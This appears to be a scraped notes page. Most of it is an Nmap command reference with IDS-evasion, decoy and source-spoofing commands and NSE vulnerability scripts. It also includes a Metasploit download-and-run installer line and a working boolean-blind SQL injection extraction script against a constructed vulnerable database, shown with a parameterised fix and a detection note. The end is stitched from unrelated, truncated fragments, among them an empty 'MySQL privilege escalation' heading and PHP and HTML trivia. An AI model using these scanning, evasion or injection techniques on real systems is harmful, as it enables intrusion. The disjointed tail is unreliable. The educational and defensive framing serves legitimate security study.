Nmap command reference

- Target Specification

(Example targets throughout this sheet use 192.0.2.0/24, an RFC 5737 documentation range, standing in for the page's original example addresses, which were lost in extraction.)

Switch                  Example                                         Description
(none)                  nmap 192.0.2.1                                  Scan a single IP
(none)                  nmap 192.0.2.1 192.0.2.2                        Scan specific IPs
(none)                  nmap 192.0.2.1-254                              Scan a range
(none)                  nmap scanme.nmap.org                            Scan a hostname
(none)                  nmap 192.0.2.0/24                               Scan using CIDR notation
-iL                     nmap -iL targets.txt                            Scan targets from a file (one target per line)
-iR                     nmap -iR 100                                    Scan 100 random Internet hosts (only scan hosts you are authorised to)
--exclude               nmap 192.0.2.0/24 --exclude 192.0.2.1           Exclude listed hosts

- Scan Techniques

Switch                  Example                                         Description
-sS                     nmap -sS 192.0.2.1                              TCP SYN port scan (default when run as root; needs raw-socket privileges)
-sT                     nmap -sT 192.0.2.1                              TCP connect port scan (default without root privilege; completes the handshake, so the service sees and may log the connection)
-sU                     nmap -sU 192.0.2.1                              UDP port scan (slow; expect many open|filtered results, because open UDP ports often do not answer)
-sA                     nmap -sA 192.0.2.1                              TCP ACK scan: maps firewall rules (filtered vs unfiltered), does not tell open from closed
-sW                     nmap -sW 192.0.2.1                              TCP Window port scan (ACK scan that also inspects the TCP window field)
-sM                     nmap -sM 192.0.2.1                              TCP Maimon port scan (FIN/ACK probe)

- Host Discovery

Switch                  Example                                         Description
-sL                     nmap -sL 192.0.2.0/24                           No scan. List targets only (still does reverse DNS unless -n is given)
-sn                     nmap -sn 192.0.2.0/24                           Disable port scanning. Host discovery only
-Pn                     nmap -Pn 192.0.2.1                              Disable host discovery. Port scan only (every target is treated as up)
-PS                     nmap -PS22-25,80 192.0.2.1                      TCP SYN discovery on the given port(s). Port 80 by default. No space between -PS and the port list
-PA                     nmap -PA22-25,80 192.0.2.1                      TCP ACK discovery on the given port(s). Port 80 by default
-PU                     nmap -PU53 192.0.2.1                            UDP discovery on the given port(s). Port 40125 by default
-PR                     nmap -PR 192.0.2.0/24                           ARP discovery on the local network (Nmap already uses ARP automatically for targets on the local Ethernet segment)
-n                      nmap -n 192.0.2.1                               Never do DNS resolution

- Port Specification

Switch                  Example                                         Description
-p                      nmap -p 21 192.0.2.1                            Port scan for port x
-p                      nmap -p 21-100 192.0.2.1                        Port range
-p                      nmap -p U:53,T:21-25,80 192.0.2.1               Port scan multiple TCP and UDP ports (the U: part is only scanned if -sU is combined with a TCP scan type, e.g. -sS -sU)
-p-                     nmap -p- 192.0.2.1                              Port scan all 65535 ports
-p                      nmap -p http,https 192.0.2.1                    Port scan from service name (looked up in nmap-services)
-F                      nmap -F 192.0.2.1                               Fast port scan (the 100 most common ports)
--top-ports             nmap --top-ports 2000 192.0.2.1                 Port scan the x most common ports
-p-65535                nmap -p-65535 192.0.2.1                         Leaving off the initial port in a range makes the scan start at port 1
-p0-                    nmap -p0- 192.0.2.1                             Leaving off the end port in a range makes the scan go through to port 65535 (here starting from port 0)

- Service and Version Detection

Switch                  Example                                         Description
-sV                     nmap -sV 192.0.2.1                              Attempts to determine the version of the service running on each open port
-sV --version-intensity nmap -sV --version-intensity 8 192.0.2.1        Intensity level 0 to 9 (default 7). A higher level sends more probes: more likely to be correct, slower
-sV --version-light     nmap -sV --version-light 192.0.2.1              Light mode (intensity 2). Lower chance of a correct match. Faster
-sV --version-all       nmap -sV --version-all 192.0.2.1                Intensity level 9. Higher chance of a correct match. Slower
-A                      nmap -A 192.0.2.1                               Enables OS detection, version detection, script scanning (the default scripts), and traceroute

- OS Detection

Switch                  Example                                         Description
-O                      nmap -O 192.0.2.1                               Remote OS detection using TCP/IP stack fingerprinting
-O --osscan-limit       nmap -O --osscan-limit 192.0.2.1                Skip OS detection against hosts that do not have at least one open and one closed TCP port
-O --osscan-guess       nmap -O --osscan-guess 192.0.2.1                Makes Nmap guess more aggressively when there is no exact fingerprint match
-O --max-os-tries       nmap -O --max-os-tries 1 192.0.2.1              Set the maximum number x of OS detection tries against a target (default up to 5)
-A                      nmap -A 192.0.2.1                               Enables OS detection, version detection, script scanning, and traceroute

- Timing and Performance

Switch                  Example                                         Description
-T0                     nmap -T0 192.0.2.1                              Paranoid (0): Intrusion Detection System evasion; one probe at a time with a 5 minute wait between probes, so even a small scan takes hours
-T1                     nmap -T1 192.0.2.1                              Sneaky (1): Intrusion Detection System evasion; 15 seconds between probes
-T2                     nmap -T2 192.0.2.1                              Polite (2): slows down the scan to use less bandwidth and fewer target machine resources
-T3                     nmap -T3 192.0.2.1                              Normal (3): the default speed
-T4                     nmap -T4 192.0.2.1                              Aggressive (4): speeds up scans; assumes you are on a reasonably fast and reliable network
-T5                     nmap -T5 192.0.2.1                              Insane (5): speeds up scans further; assumes you are on an extraordinarily fast network, and can miss ports

  • NSE Scripts

Switch                  Example                                                         Description
-sC                     nmap -sC 192.0.2.1                                              Scan with the default NSE scripts. Considered useful for discovery and safe
--script default        nmap --script default 192.0.2.1                                 Scan with the default NSE scripts (same as -sC)
--script                nmap --script=banner 192.0.2.1                                  Scan with a single script. Example: banner
--script                nmap --script="http*" 192.0.2.1                                 Scan with a wildcard. Example: every script whose name starts with http (quote the pattern so the shell does not expand it; this set includes intrusive scripts)
--script                nmap --script=http-title,banner 192.0.2.1                       Scan with two scripts. Example: http-title and banner (http on its own is neither a script nor a category and is rejected)
--script                nmap --script "default and not intrusive" 192.0.2.1             Scan with the default scripts minus the intrusive category. Plain "not intrusive" selects every non-intrusive script, not just the defaults
--script-args           nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.0.2.1   NSE script with arguments

- Useful NSE Script Examples

  HTTP site map generator (spiders the site):
    nmap -Pn --script=http-sitemap-generator scanme.nmap.org

  Fast search for random web servers on the Internet (only scan hosts you are authorised to):
    nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000

  Brute-force DNS hostnames, guessing subdomains of domain.com:
    nmap -Pn --script=dns-brute domain.com

  SMB enumeration and vulnerability scripts (the wildcards were lost in the extracted page and are restored here; note that the smb-vuln* scripts are not all in the safe category and can crash fragile targets):
    nmap -n -Pn -vv -O -sV --script "smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2*" 192.0.2.1

  WHOIS query (quote the pattern so the shell does not expand it):
    nmap --script "whois*" domain.com

  Detect reflected, unescaped output (possible cross-site scripting):
    nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org

  Check for SQL injection errors in form and URL parameters:
    nmap -p80 --script http-sql-injection scanme.nmap.org

  • Firewall / IDS Evasion and Spoofing

Switch                  Example                                                         Description
-f                      nmap -f 192.0.2.1                                               Send the requested scan (including ping scans) in tiny fragmented IP packets. Harder for simple packet filters; an IDS that reassembles fragments is not fooled
--mtu                   nmap --mtu 32 192.0.2.1                                         Set your own fragment size (must be a multiple of 8)
-D                      nmap -D decoy-ip1,decoy-ip2,ME,decoy-ip3 192.0.2.1              Send scans from spoofed decoy IPs mixed in with your own (ME marks your real address; the page's original decoy list was lost in extraction, the names here are placeholders)
-D                      nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip   The example above explained
-S                      nmap -e eth0 -Pn -S www.microsoft.com www.facebook.com          Scan www.facebook.com with a source address spoofed as www.microsoft.com (-e eth0 -Pn are usually required). Replies go to the spoofed address, so you see no results unless you can sniff them
-g                      nmap -g 53 192.0.2.1                                            Use the given source port number (some filters trust traffic from port 53 or 20)
--proxies               nmap --proxies http://proxy1:8080,socks4://proxy2:1080 192.0.2.1   Relay connections through HTTP/SOCKS4 proxies (placeholder proxy names; the page's list was lost). Only NSE and version detection go through the proxies, not host discovery or the port scan itself
--data-length           nmap --data-length 200 192.0.2.1                                Append 200 bytes of random data to sent packets, so probes no longer match fixed-size signatures

- Example IDS Evasion command

nmap -f -T0 -n -Pn --data-length 200 -D decoy-ip1,decoy-ip2,ME,decoy-ip3 192.0.2.1

(The page's "-t 0" is not an Nmap option; the timing template is -T0. The decoy list was lost in extraction, so decoy-ip1 etc. are placeholders. With -T0 expect a scan of even a few ports to take hours.)

  • Output

Switch                  Example                                         Description
-oN                     nmap -oN normal.file 192.0.2.1                  Normal output to the file normal.file
-oX                     nmap -oX xml.file 192.0.2.1                     XML output to the file xml.file
-oG                     nmap -oG grep.file 192.0.2.1                    Grepable output to the file grep.file
-oA                     nmap -oA results 192.0.2.1                      Output in the three major formats at once (results.nmap, results.xml, results.gnmap)
-oG -                   nmap -oG - 192.0.2.1                            Grepable output to the screen. -oN -, -oX - also usable
--append-output         nmap -oN file.file --append-output 192.0.2.1    Append a scan to a previous scan file
-v                      nmap -v 192.0.2.1                               Increase the verbosity level (use -vv or more for greater effect)
-d                      nmap -d 192.0.2.1                               Increase the debugging level (use -dd or more for greater effect)
--reason                nmap --reason 192.0.2.1                         Display the reason a port is in a particular state (e.g. syn-ack, reset, no-response); the same information -vv shows
--open                  nmap --open 192.0.2.1                           Only show open (or possibly open) ports
--packet-trace          nmap -T4 --packet-trace 192.0.2.1               Show all packets sent and received
--iflist                nmap --iflist                                   Show the host's interfaces and routes
--resume                nmap --resume results.file                      Resume an aborted scan from its normal (-oN) or grepable (-oG) output file

  • Helpful Nmap Output examples

  Scan for web servers and grep to show which IPs are running one:
    nmap -p80 -sV -oG - --open 192.0.2.0/24 | grep open

  Generate a list of the IPs of live hosts (XML goes to out.xml; the normal output on stdout is parsed for the "Nmap scan report for <ip>" lines, so match the full phrase rather than just "Nmap", which also hits the Starting/done lines):
    nmap -iR 10 -n -oX out.xml | grep "Nmap scan report" | cut -d " " -f5 > live-hosts.txt

  Append IPs to the list of live hosts:
    nmap -iR 10 -n -oX out2.xml | grep "Nmap scan report" | cut -d " " -f5 >> live-hosts.txt

  Compare the output of two Nmap runs using ndiff:
    ndiff scan1.xml scan2.xml

  Convert an Nmap XML file to HTML:
    xsltproc nmap.xml -o nmap.html

  Reverse-sorted list of how often each open port line turns up:
    grep " open " results.nmap | sed -r 's/ +/ /g' | sort | uniq -c | sort -rn | less
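The grep/cut pipelines above break as soon as a hostname or a second field appears on the line. As an added example, not part of the original cheat sheet, the following Python parses grepable (-oG) output field by field and reproduces the three tasks above (open ports per host, port frequency, hosts running a web server). The scan text is constructed for the example, not a real scan, and the addresses are RFC 5737 documentation addresses.

```python
"""Parse Nmap grepable (-oG) output into per-host port lists.

Added example, not part of the original cheat sheet. SAMPLE_GNMAP is a
constructed -oG transcript (not a real scan); addresses are RFC 5737
documentation addresses.
"""
import re
from collections import Counter

SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sV -p22,80,443,3306 -oG - 192.0.2.0/29\n"
    "Host: 192.0.2.1 ()\tStatus: Up\n"
    "Host: 192.0.2.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/, "
    "443/closed/tcp//https///, 3306/filtered/tcp//mysql///\tIgnored State: closed (0)\n"
    "Host: 192.0.2.2 ()\tStatus: Up\n"
    "Host: 192.0.2.2 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/closed/tcp//http///, "
    "443/open/tcp//ssl|https//Apache httpd 2.4.52/, 3306/open/tcp//mysql//MySQL 8.0.33/\n"
    "Host: 192.0.2.3 ()\tStatus: Down\n"
    "# Nmap done at Mon Jan  1 00:00:05 2024 -- 8 IP addresses (2 hosts up) scanned in 5.21 seconds\n"
)

HOST_RE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)")


def parse_gnmap(text):
    """Return {ip: [(port, proto, state, service, version), ...]}.

    A host that is down, or up without a Ports: line, maps to [].
    Each port entry has seven slash-separated fields:
    port/state/proto/owner/service/rpcinfo/version. Nmap rewrites any
    '/' inside a field as '|' (e.g. ssl|https), so splitting on '/' is safe.
    """
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # '#' comment and summary lines
        ip = m.group("ip")
        hosts.setdefault(ip, [])
        # Tab-separated "Key: value" fields: Host, Status, Ports, Ignored State, OS, ...
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ports = fields.get("Ports")
        if not ports:
            continue
        for entry in ports.split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue  # malformed entry: skip rather than crash
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            hosts[ip].append((int(port), proto, state, service, version))
    return hosts


def open_ports(hosts):
    """{ip: [(port, proto), ...]} for hosts with at least one open port (like --open)."""
    result = {}
    for ip, entries in hosts.items():
        opened = sorted((p, proto) for p, proto, state, _s, _v in entries if state == "open")
        if opened:
            result[ip] = opened
    return result


def port_frequency(hosts):
    """How often each open port turns up across hosts (the `sort | uniq -c | sort -rn` idea)."""
    counts = Counter()
    for entries in hosts.values():
        for p, proto, state, _s, _v in entries:
            if state == "open":
                counts[f"{p}/{proto}"] += 1
    return counts


def web_servers(hosts):
    """IPs with an open port whose detected service name contains 'http'
    (the `-p80 -oG - --open | grep open` idea, keyed on the service rather than the port)."""
    return sorted(ip for ip, entries in hosts.items()
                  if any(state == "open" and "http" in svc for _p, _pr, state, svc, _v in entries))


if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_GNMAP)
    for ip, ports in open_ports(hosts).items():
        print(ip, ", ".join(f"{p}/{proto}" for p, proto in ports))
    for port, n in port_frequency(hosts).most_common():
        print(f"{n:4d} {port}")
    print("web servers:", web_servers(hosts))
```

To run it on a real scan, read the .gnmap file written by -oG or -oA into `parse_gnmap` instead of SAMPLE_GNMAP; the `Ignored State` and `OS` fields are parsed into `fields` as well if you need them.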

- Miscellaneous Options

Switch                  Example                                         Description
-6                      nmap -6 2607:f0d0:1002:51::4                    Enable IPv6 scanning
-h                      nmap -h                                         Nmap help screen

- Other Useful Nmap Commands

  Discovery only on the listed ports, no port scan:
    nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn

  ARP discovery only on the local network, no port scan:
    nmap -PR -sn -vv 192.0.2.0/24

  Traceroute to random targets, no port scan (the option is --traceroute, with two dashes):
    nmap -iR 10 -sn --traceroute

  Query an internal DNS server for hosts, list targets only (the option is --dns-servers; the server address is a placeholder, the page's original was lost):
    nmap -sL --dns-servers 192.0.2.53 192.0.2.0/24

Installing Metasploit Framework with the official installer script:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

This downloads a script and executes it with no integrity check beyond TLS; read msfinstall before running it. The first run of msfconsole then offers to set up the PostgreSQL database:

** Welcome to Metasploit Framework Initial Setup **
Please answer a few questions to get started.
Would you like to use and setup a new database (recommended)?
Please answer yes or no.
Would you like to use and setup a new database (recommended)? yes
Creating database at /home/lujinli/.msf4/db
Starting database at /home/lujinli/.msf4/db...success
Creating database users
Creating initial database schema
msf > db_status
[*] postgresql connected to msf

Blind SQL injection comes in three forms:

  • Boolean-based blind injection
  • Time-based blind injection
  • Error-based injection

What you observe when submitting a test SQL statement:

  • The page returns normally, but with no error message;
  • A generic error page is returned;
  • Neither an error page nor any other change in the page output;
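The three observations map onto the three techniques: a visible true/false difference in the page is a boolean oracle; a generic error page is also one bit per request (the query errored or it did not); and when nothing in the output changes, only a timing side channel (a conditional delay such as MySQL's SLEEP()) is left. As an added example, not code from the original page, the following Python shows boolean-based blind extraction against a constructed, deliberately vulnerable SQLite lookup (the users table, the user alice and her password are invented for the example), next to the parameterised version that the same technique fails against. Time-based extraction uses the same binary search with the delay standing in for the true/false page difference.

```python
"""Boolean-based blind SQL injection: extracting data through a yes/no oracle.

Added example, not code from the original page. The target is a
constructed, deliberately vulnerable lookup over an in-memory SQLite
database; the table, users and password are invented for the example.
"""
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                    [("alice", "s3cret!"), ("bob", "hunter2")])
    return con


def user_exists_vulnerable(con, username):
    """Deliberately vulnerable: the parameter is pasted into the SQL text.

    The caller only learns True/False (a "user found" page vs a "not
    found" page) and any SQL error collapses to False (a generic error
    page). No data or error text is returned, yet one bit leaks per request.
    """
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def user_exists_safe(con, username):
    """Hardened version: a bound parameter is data, never SQL syntax."""
    row = con.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def ask(oracle, condition):
    """Turn one SQL condition into a yes/no question via the injectable parameter.

    Payload shape:  x' OR (<condition>) --
    closes the quoted string, ORs in our condition and comments out the
    remainder of the original query (its trailing quote).
    """
    return oracle(f"x' OR ({condition}) -- ")


def extract_int(oracle, expr, lo, hi):
    """Binary-search the value of an integer SQL expression known to lie in [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(oracle, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle, expr, max_len=64):
    """Recover a string SQL expression one character at a time.

    Asks for length() first, then unicode(substr(...)) per position, so the
    cost is about 7 requests per printable character. Returns '' when the
    oracle never answers yes (e.g. against the parameterised lookup).
    """
    length = extract_int(oracle, f"length({expr})", 0, max_len)
    return "".join(
        chr(extract_int(oracle, f"unicode(substr({expr}, {i}, 1))", 32, 126))
        for i in range(1, length + 1))


class CountingOracle:
    """Wrap a lookup function and count requests, as a web server log would show them."""
    def __init__(self, func):
        self.func, self.requests = func, 0

    def __call__(self, username):
        self.requests += 1
        return self.func(username)


TARGET = "(SELECT password FROM users WHERE username = 'alice')"

if __name__ == "__main__":
    con = make_db()
    leaky = CountingOracle(lambda u: user_exists_vulnerable(con, u))
    print("vulnerable:", repr(extract_string(leaky, TARGET)), "in", leaky.requests, "requests")
    fixed = CountingOracle(lambda u: user_exists_safe(con, u))
    print("parameterised:", repr(extract_string(fixed, TARGET)), "in", fixed.requests, "requests")
```

The request count is the detection angle: a boolean-blind extraction is a burst of near-identical requests to one parameter whose only difference is a changing number in the payload, which is easy to spot in access logs even though every individual response looks ordinary.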

In day-to-day PHP practice, page 515 of the book 《跟兄弟连学php》 says

MySQL privilege escalation

For POST requests it is better to read php://input instead of $HTTP_RAW_POST_DATA, because it does not depend on a specific php.ini directive. ($HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0.)

oncanplay event

  • The oncanplay event fires when the browser has loaded enough of the video/audio (audio/video) to begin playback, not when the user starts playing it; the play and playing events cover that.